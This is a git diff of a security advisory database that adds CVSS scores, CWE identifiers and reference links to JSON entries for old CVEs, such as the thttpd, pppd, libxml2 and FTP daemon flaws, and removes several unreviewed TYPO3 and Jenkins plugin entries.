d6439fa7cd88a..0bd6f72f12766 100644 --- a/advisories/unreviewed/2022/03/GHSA-q9rw-8758-hccj/GHSA-q9rw-8758-hccj.json +++ b/advisories/unreviewed/2022/03/GHSA-q9rw-8758-hccj/GHSA-q9rw-8758-hccj.json @@ -29,6 +29,18 @@ "type": "WEB", "url": "https://lists.debian.org/nbd/2022/01/msg00037.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2UPX62BIWOOHSACGUDB7E3O4URNN37F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZHR73XMAJTCFGKUZRXVTZKCK2X3IFNA/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PU5JFD4PEJED72TZLZ5R2Q2SFXICU5I5/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G2UPX62BIWOOHSACGUDB7E3O4URNN37F/" @@ -41,6 +53,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PU5JFD4PEJED72TZLZ5R2Q2SFXICU5I5/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-10" + }, { "type": "WEB", "url": "https://sourceforge.net/projects/nbd/files/nbd/" diff --git a/advisories/unreviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json b/advisories/unreviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json deleted file mode 100644 index 5e859f4b18974..0000000000000 --- a/advisories/unreviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wjvr-2hjg-6rhj", - "modified": "2022-04-05T00:00:39Z", - "published": "2022-03-30T00:00:24Z", - "aliases": [ - "CVE-2022-28143" - ], - "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Proxmox Plugin 0.7.0 and earlier allows attackers to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28143" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-2082" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2022/03/29/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-03-29T13:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-28q9-rp4x-j7g7/GHSA-28q9-rp4x-j7g7.json b/advisories/unreviewed/2022/04/GHSA-28q9-rp4x-j7g7/GHSA-28q9-rp4x-j7g7.json index 281bc99854d9b..922c25e3f7788 100644 --- a/advisories/unreviewed/2022/04/GHSA-28q9-rp4x-j7g7/GHSA-28q9-rp4x-j7g7.json +++ b/advisories/unreviewed/2022/04/GHSA-28q9-rp4x-j7g7/GHSA-28q9-rp4x-j7g7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-28q9-rp4x-j7g7", - "modified": "2022-04-29T01:27:11Z", + "modified": "2024-02-02T15:30:25Z", "published": "2022-04-29T01:27:11Z", "aliases": [ "CVE-2003-0899" ], "details": "Buffer overflow in defang in libhttpd.c for thttpd 2.21 to 2.23b1 allows remote attackers to execute arbitrary code via requests that contain '<' or '>' characters, which trigger the overflow when the characters are expanded to \"<\" and \">\" sequences.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -49,7 +52,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-2cgm-mxqq-wprv/GHSA-2cgm-mxqq-wprv.json b/advisories/unreviewed/2022/04/GHSA-2cgm-mxqq-wprv/GHSA-2cgm-mxqq-wprv.json index be88494ba393b..50bba2e28e229 100644 --- a/advisories/unreviewed/2022/04/GHSA-2cgm-mxqq-wprv/GHSA-2cgm-mxqq-wprv.json +++ b/advisories/unreviewed/2022/04/GHSA-2cgm-mxqq-wprv/GHSA-2cgm-mxqq-wprv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2cgm-mxqq-wprv", - "modified": "2022-04-29T03:00:36Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-29T03:00:36Z", "aliases": [ "CVE-2004-1995" ], "details": "Cross-Site Request Forgery (CSRF) vulnerability in FuseTalk 2.0 allows remote attackers to create arbitrary accounts via a link to adduser.cfm.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-2j2f-h2gf-6r4c/GHSA-2j2f-h2gf-6r4c.json b/advisories/unreviewed/2022/04/GHSA-2j2f-h2gf-6r4c/GHSA-2j2f-h2gf-6r4c.json index 5be52399d3d50..9bf479a4e5bb7 100644 --- a/advisories/unreviewed/2022/04/GHSA-2j2f-h2gf-6r4c/GHSA-2j2f-h2gf-6r4c.json +++ b/advisories/unreviewed/2022/04/GHSA-2j2f-h2gf-6r4c/GHSA-2j2f-h2gf-6r4c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2j2f-h2gf-6r4c", - "modified": "2022-04-29T03:01:00Z", + "modified": "2024-02-08T03:32:44Z", "published": "2022-04-29T03:01:00Z", "aliases": [ "CVE-2004-2214" ], "details": "Mbedthis AppWeb HTTP server before 1.1.3 allows remote attackers to bypass access restrictions via a URI with mixed case characters.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-2wm2-cfr8-8vw9/GHSA-2wm2-cfr8-8vw9.json b/advisories/unreviewed/2022/04/GHSA-2wm2-cfr8-8vw9/GHSA-2wm2-cfr8-8vw9.json index 80b2c5ea5d70b..df2d2629e58d7 100644 --- a/advisories/unreviewed/2022/04/GHSA-2wm2-cfr8-8vw9/GHSA-2wm2-cfr8-8vw9.json +++ b/advisories/unreviewed/2022/04/GHSA-2wm2-cfr8-8vw9/GHSA-2wm2-cfr8-8vw9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2wm2-cfr8-8vw9", - "modified": "2022-04-29T02:58:46Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-04-29T02:58:46Z", "aliases": [ "CVE-2004-1002" ], "details": "Integer underflow in pppd in cbcp.c for ppp 2.4.1 allows remote attackers to cause a denial of service (daemon crash) via a CBCP packet with an invalid length value that causes pppd to access an incorrect memory location.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-191" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json b/advisories/unreviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json deleted file mode 100644 index aa05c68bf23f7..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3276-p9f2-8q89", - "modified": "2022-04-21T01:57:47Z", - "published": "2022-04-21T01:57:47Z", - "aliases": [ - "CVE-2010-3670" - ], - "details": "TYPO3 before 4.3.4 and 4.4.x before 4.4.1 contains insecure randomness during generation of a hash with the \"forgot password\" function.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3670" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3670" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Insecure_Randomness" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-05T20:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-3mf3-33v4-jcj2/GHSA-3mf3-33v4-jcj2.json b/advisories/unreviewed/2022/04/GHSA-3mf3-33v4-jcj2/GHSA-3mf3-33v4-jcj2.json index 3be78d89820b2..7461581c57227 100644 --- a/advisories/unreviewed/2022/04/GHSA-3mf3-33v4-jcj2/GHSA-3mf3-33v4-jcj2.json +++ b/advisories/unreviewed/2022/04/GHSA-3mf3-33v4-jcj2/GHSA-3mf3-33v4-jcj2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3mf3-33v4-jcj2", - "modified": "2022-04-30T18:21:53Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:21:53Z", "aliases": [ "CVE-2002-1796" ], "details": "ChaiVM EZloader for HP color LaserJet 4500 and 4550 and HP LaserJet 4100 and 8150 does not properly verify JAR signatures for new services, which allows local users to load unauthorized Chai services.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-347" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-3vgv-pgwc-8f57/GHSA-3vgv-pgwc-8f57.json b/advisories/unreviewed/2022/04/GHSA-3vgv-pgwc-8f57/GHSA-3vgv-pgwc-8f57.json index 6be970a664683..aff4681ac55bf 100644 --- a/advisories/unreviewed/2022/04/GHSA-3vgv-pgwc-8f57/GHSA-3vgv-pgwc-8f57.json +++ b/advisories/unreviewed/2022/04/GHSA-3vgv-pgwc-8f57/GHSA-3vgv-pgwc-8f57.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3vgv-pgwc-8f57", - "modified": "2022-04-30T18:16:41Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-30T18:16:41Z", "aliases": [ "CVE-2001-0766" ], "details": "Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json b/advisories/unreviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json deleted file mode 100644 index 48769bc6d9d1e..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-48ww-8h7g-4hwq", - "modified": "2022-04-21T01:57:47Z", - "published": "2022-04-21T01:57:47Z", - "aliases": [ - "CVE-2010-3667" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Spam Abuse in the native form content element.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3667" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3667" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Spam_Abuse" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-04T22:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-4rm4-8m7j-xwx3/GHSA-4rm4-8m7j-xwx3.json b/advisories/unreviewed/2022/04/GHSA-4rm4-8m7j-xwx3/GHSA-4rm4-8m7j-xwx3.json index b358416418ba3..c214ff89ecf84 100644 --- a/advisories/unreviewed/2022/04/GHSA-4rm4-8m7j-xwx3/GHSA-4rm4-8m7j-xwx3.json +++ b/advisories/unreviewed/2022/04/GHSA-4rm4-8m7j-xwx3/GHSA-4rm4-8m7j-xwx3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4rm4-8m7j-xwx3", - "modified": "2022-04-30T18:22:07Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:22:07Z", "aliases": [ "CVE-2002-1915" ], "details": "tip on multiple BSD-based operating systems allows local users to cause a denial of service (execution prevention) by using flock() to lock the /var/log/acculog file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-667" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json b/advisories/unreviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json deleted file mode 100644 index 148d372669e66..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-4rvc-5hrh-qmwf", - "modified": "2022-04-21T01:57:46Z", - "published": "2022-04-21T01:57:46Z", - "aliases": [ - "CVE-2010-3662" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows SQL Injection on the backend.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3662" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3662" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#SQL_Injection" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-04T22:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-5337-f6v6-75gf/GHSA-5337-f6v6-75gf.json b/advisories/unreviewed/2022/04/GHSA-5337-f6v6-75gf/GHSA-5337-f6v6-75gf.json index 43b0095bafea6..1759897da2d50 100644 --- a/advisories/unreviewed/2022/04/GHSA-5337-f6v6-75gf/GHSA-5337-f6v6-75gf.json +++ b/advisories/unreviewed/2022/04/GHSA-5337-f6v6-75gf/GHSA-5337-f6v6-75gf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5337-f6v6-75gf", - "modified": "2022-04-29T03:00:33Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-29T03:00:33Z", "aliases": [ "CVE-2004-1967" ], "details": "Cross-site request forgery (CSRF) vulnerabilities in (1) cp_forums.php, (2) cp_usergroup.php, (3) cp_ipbans.php, (4) myhome.php, (5) post.php, or (6) moderator.php in Open Bulletin Board (OpenBB) 1.0.6 and earlier allow remote attackers to execute arbitrary code by including the code in an image tag or a link.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-55c6-r3wh-x7cj/GHSA-55c6-r3wh-x7cj.json b/advisories/unreviewed/2022/04/GHSA-55c6-r3wh-x7cj/GHSA-55c6-r3wh-x7cj.json index 95f0078d7e38e..71d026c81134a 100644 --- a/advisories/unreviewed/2022/04/GHSA-55c6-r3wh-x7cj/GHSA-55c6-r3wh-x7cj.json +++ b/advisories/unreviewed/2022/04/GHSA-55c6-r3wh-x7cj/GHSA-55c6-r3wh-x7cj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-55c6-r3wh-x7cj", - "modified": "2022-04-30T18:13:50Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:13:50Z", "aliases": [ "CVE-2000-0552" ], "details": "ICQwebmail client for ICQ 2000A creates a world readable temporary file during login and does not delete it, which allows local users to obtain sensitive information.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-5fxq-3r3p-42m4/GHSA-5fxq-3r3p-42m4.json b/advisories/unreviewed/2022/04/GHSA-5fxq-3r3p-42m4/GHSA-5fxq-3r3p-42m4.json index 65f582ddec648..49a101edf6d45 100644 --- a/advisories/unreviewed/2022/04/GHSA-5fxq-3r3p-42m4/GHSA-5fxq-3r3p-42m4.json +++ b/advisories/unreviewed/2022/04/GHSA-5fxq-3r3p-42m4/GHSA-5fxq-3r3p-42m4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5fxq-3r3p-42m4", - "modified": "2022-04-30T18:13:26Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:13:26Z", "aliases": [ "CVE-2000-0338" ], "details": "Concurrent Versions Software (CVS) uses predictable temporary file names for locking, which allows local users to cause a denial of service by creating the lock directory before it is created for use by a legitimate CVS user.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-667" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-5j4q-p8r9-g32c/GHSA-5j4q-p8r9-g32c.json b/advisories/unreviewed/2022/04/GHSA-5j4q-p8r9-g32c/GHSA-5j4q-p8r9-g32c.json index cd0dc43ca543c..727cf0f8f43ae 100644 --- a/advisories/unreviewed/2022/04/GHSA-5j4q-p8r9-g32c/GHSA-5j4q-p8r9-g32c.json +++ b/advisories/unreviewed/2022/04/GHSA-5j4q-p8r9-g32c/GHSA-5j4q-p8r9-g32c.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26359" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5117" diff --git a/advisories/unreviewed/2022/04/GHSA-64cj-w4v7-5f35/GHSA-64cj-w4v7-5f35.json b/advisories/unreviewed/2022/04/GHSA-64cj-w4v7-5f35/GHSA-64cj-w4v7-5f35.json index 721ddd9be6ae6..e97438eb3928b 100644 --- a/advisories/unreviewed/2022/04/GHSA-64cj-w4v7-5f35/GHSA-64cj-w4v7-5f35.json +++ b/advisories/unreviewed/2022/04/GHSA-64cj-w4v7-5f35/GHSA-64cj-w4v7-5f35.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-64cj-w4v7-5f35", - "modified": "2022-04-30T18:22:28Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-30T18:22:28Z", "aliases": [ "CVE-2002-2070" ], "details": "SecureClean 3 build 2.0 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-69rx-rcww-qf58/GHSA-69rx-rcww-qf58.json b/advisories/unreviewed/2022/04/GHSA-69rx-rcww-qf58/GHSA-69rx-rcww-qf58.json index d9c65ed842225..11b6e412da83c 100644 --- a/advisories/unreviewed/2022/04/GHSA-69rx-rcww-qf58/GHSA-69rx-rcww-qf58.json +++ b/advisories/unreviewed/2022/04/GHSA-69rx-rcww-qf58/GHSA-69rx-rcww-qf58.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-69rx-rcww-qf58", - "modified": "2022-04-29T01:26:06Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-29T01:26:06Z", "aliases": [ "CVE-2003-0252" ], "details": "Off-by-one error in the xlog function of mountd in the Linux NFS utils package (nfs-utils) before 1.0.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via certain RPC requests to mountd that do not contain newlines.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -97,7 +100,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-6fwh-897j-m5cj/GHSA-6fwh-897j-m5cj.json b/advisories/unreviewed/2022/04/GHSA-6fwh-897j-m5cj/GHSA-6fwh-897j-m5cj.json index b2f8a49e8ef3b..ca8682808ebc2 100644 --- a/advisories/unreviewed/2022/04/GHSA-6fwh-897j-m5cj/GHSA-6fwh-897j-m5cj.json +++ b/advisories/unreviewed/2022/04/GHSA-6fwh-897j-m5cj/GHSA-6fwh-897j-m5cj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6fwh-897j-m5cj", - "modified": "2022-04-30T18:21:42Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:21:42Z", "aliases": [ "CVE-2002-1706" ], "details": "Cisco IOS software 11.3 through 12.2 running on Cisco uBR7200 and uBR7100 series Universal Broadband Routers allows remote attackers to modify Data Over Cable Service Interface Specification (DOCSIS) settings via a DOCSIS file without a Message Integrity Check (MIC) signature, which is approved by the router.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-347" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-6m44-c224-92xx/GHSA-6m44-c224-92xx.json b/advisories/unreviewed/2022/04/GHSA-6m44-c224-92xx/GHSA-6m44-c224-92xx.json index 3cd1b555d06e3..003df624ec28a 100644 --- a/advisories/unreviewed/2022/04/GHSA-6m44-c224-92xx/GHSA-6m44-c224-92xx.json +++ b/advisories/unreviewed/2022/04/GHSA-6m44-c224-92xx/GHSA-6m44-c224-92xx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6m44-c224-92xx", - "modified": "2022-04-30T18:15:42Z", + "modified": "2024-02-02T03:30:27Z", "published": "2022-04-30T18:15:42Z", "aliases": [ "CVE-2001-0248" ], "details": "Buffer overflow in FTP server in HPUX 11 allows remote attackers to execute arbitrary commands by creating a long pathname and calling the STAT command, which uses glob to generate long strings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-6wfm-7hqx-39wg/GHSA-6wfm-7hqx-39wg.json b/advisories/unreviewed/2022/04/GHSA-6wfm-7hqx-39wg/GHSA-6wfm-7hqx-39wg.json index edc519d41ecd7..79c9fdfd6857a 100644 --- a/advisories/unreviewed/2022/04/GHSA-6wfm-7hqx-39wg/GHSA-6wfm-7hqx-39wg.json +++ b/advisories/unreviewed/2022/04/GHSA-6wfm-7hqx-39wg/GHSA-6wfm-7hqx-39wg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6wfm-7hqx-39wg", - "modified": "2022-04-29T01:28:19Z", + "modified": "2024-02-02T15:30:25Z", "published": "2022-04-29T01:28:19Z", "aliases": [ "CVE-2003-1564" ], "details": "libxml2, possibly before 2.5.0, does not properly detect recursion during entity expansion, which allows context-dependent attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document containing a large number of nested entity references, aka the \"billion laughs attack.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-776" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-746g-hg8c-j9cg/GHSA-746g-hg8c-j9cg.json b/advisories/unreviewed/2022/04/GHSA-746g-hg8c-j9cg/GHSA-746g-hg8c-j9cg.json index 0f1ae81c3ea6c..c3bf43189f76e 100644 --- a/advisories/unreviewed/2022/04/GHSA-746g-hg8c-j9cg/GHSA-746g-hg8c-j9cg.json +++ b/advisories/unreviewed/2022/04/GHSA-746g-hg8c-j9cg/GHSA-746g-hg8c-j9cg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-746g-hg8c-j9cg", - "modified": "2022-04-30T18:15:41Z", + "modified": "2024-02-02T03:30:27Z", "published": "2022-04-30T18:15:41Z", "aliases": [ "CVE-2001-0249" ], "details": "Heap overflow in FTP daemon in Solaris 8 allows remote attackers to execute arbitrary commands by creating a long pathname and calling the LIST command, which uses glob to generate long strings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-7hcc-g6hm-h786/GHSA-7hcc-g6hm-h786.json b/advisories/unreviewed/2022/04/GHSA-7hcc-g6hm-h786/GHSA-7hcc-g6hm-h786.json index 1c484628ceb98..4aa047a9db7f7 100644 --- a/advisories/unreviewed/2022/04/GHSA-7hcc-g6hm-h786/GHSA-7hcc-g6hm-h786.json +++ b/advisories/unreviewed/2022/04/GHSA-7hcc-g6hm-h786/GHSA-7hcc-g6hm-h786.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7hcc-g6hm-h786", - "modified": "2022-04-30T18:17:56Z", + "modified": "2024-02-02T03:30:27Z", "published": "2022-04-30T18:17:56Z", "aliases": [ "CVE-2001-1391" ], "details": "Off-by-one vulnerability in CPIA driver of Linux kernel before 2.2.19 allows users to modify kernel memory.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -65,7 +68,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], "severity": "LOW", 